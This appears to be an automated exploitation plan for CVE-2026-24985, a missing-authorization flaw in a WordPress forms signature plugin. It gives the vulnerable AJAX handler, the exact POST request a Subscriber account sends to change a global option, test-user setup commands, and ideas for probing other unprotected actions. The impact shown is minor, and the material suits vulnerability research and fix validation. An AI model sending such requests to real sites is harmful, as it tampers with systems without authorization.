Exploitation Research Plan: CVE-2026-24985

1. Vulnerability Summary

CVE-2026-24985 is a Missing Authorization and Missing Cross-Site Request Forgery (CSRF) vulnerability in the WP Forms Signature Contract Add-On plugin (versions <= 1.8.2). Specifically, the AJAX handler responsible for permanently dismissing the plugin's rating widget notice lacks any capability checks (current_user_can) or nonce verification. This allows any authenticated user, including those with Subscriber-level permissions, to modify global plugin settings and dismiss notices intended for administrators.

2. Attack Vector Analysis

• Endpoint: wp-admin/admin-ajax.php
• Action: esig_wpform_ratting_widget_remove
• Method: POST
• Parameters: action=esig_wpform_ratting_widget_remove
• Authentication: Required (Subscriber or higher).
• Preconditions: The plugin must be active. The vulnerability is triggered by a lack of access control in the AJAX callback.

3. Code Flow

1. Registration: In admin/rating-widget/esign-rating-widget.php, the class esignRatingWidgetWpForm registers the AJAX action in the __construct() method (lines 53-54):

   add_action('wp_ajax_esig_wpform_ratting_widget_remove', array($this, 'esigWpformRattingWidgetRemove'));
   

   Note that it is registered under wp_ajax_, which applies to all authenticated users.
2. Trigger: An attacker sends an HTTP POST request to admin-ajax.php with the action parameter set to esig_wpform_ratting_widget_remove.
3. Execution: WordPress routes the request to the esigWpformRattingWidgetRemove method in admin/rating-widget/esign-rating-widget.php:

   public function esigWpformRattingWidgetRemove() {
       update_option('remove_rating_widget_wpform','Yes');
       die();
   }
   

4. Sink: The update_option() function (line 58) updates the global remove_rating_widget_wpform option in the wp_options table. No capability check or nonce validation occurs before this update.

4. Nonce Acquisition Strategy

Based on the source code in admin/rating-widget/esign-rating-widget.php, the function esigWpformRattingWidgetRemove does not verify a nonce.

• The JS file admin/rating-widget/assets/js/rating-widget-control.js calls esigRemoteRequest("esig_wpform_ratting_widget_remove", "POST", ...), but the PHP implementation of the receiver has zero security checks.
• Therefore, no nonce is required for this exploit.

5. Exploitation Strategy

The exploit involves authenticating as a low-privileged user (Subscriber) and sending the AJAX request to modify the site configuration.

1. Authenticate: Log in as a Subscriber.
2. Request: Send the following request via the http_request tool:
   • URL: http://[target]/wp-admin/admin-ajax.php
   • Method: POST
   • Headers:
     • Content-Type: application/x-www-form-urlencoded
   • Body: action=esig_wpform_ratting_widget_remove

6. Test Data Setup

1. Users:
   • Create an Administrator user (to verify the notice is eventually gone).
   • Create a Subscriber user (the attacker): wp user create attacker attacker@example.com --role=subscriber --user_pass=password123.
2. Plugin State: Ensure wp-forms-signature-contract-add-on is active.
3. Option Verification: Check the current state of the option:
   • wp option get remove_rating_widget_wpform should return false or anything other than Yes.

7. Expected Results

• The AJAX request should return a 200 OK status (and likely an empty response followed by termination via die()).
• The WordPress option remove_rating_widget_wpform will be set to Yes.
• The rating widget notice will no longer appear for any users, including administrators, because esignRatingWidget() in esign-rating-widget.php (line 117) checks this option:

  $checkWidget = get_option('remove_rating_widget_wpform');
  if($checkWidget == "Yes") return false;
  

8. Verification Steps

After executing the http_request, verify the impact using WP-CLI:

wp option get remove_rating_widget_wpform

Success Criteria: The command returns Yes.

9. Alternative Approaches

If the plugin is part of a larger suite where esigRemoteRequest (JS side) is expected to send a nonce (even if the server doesn't check it yet), you can verify if other actions are similarly unprotected:

• Analyze admin/esig-wpform-admin.php for add_action('wp_ajax_esig_wpform_fields', array($this, 'esig_wpform_fields'));.
• Examine the esig_wpform_fields method (not fully provided in snippet) to see if it also lacks capability checks. This would allow an attacker to enumerate WPForms fields.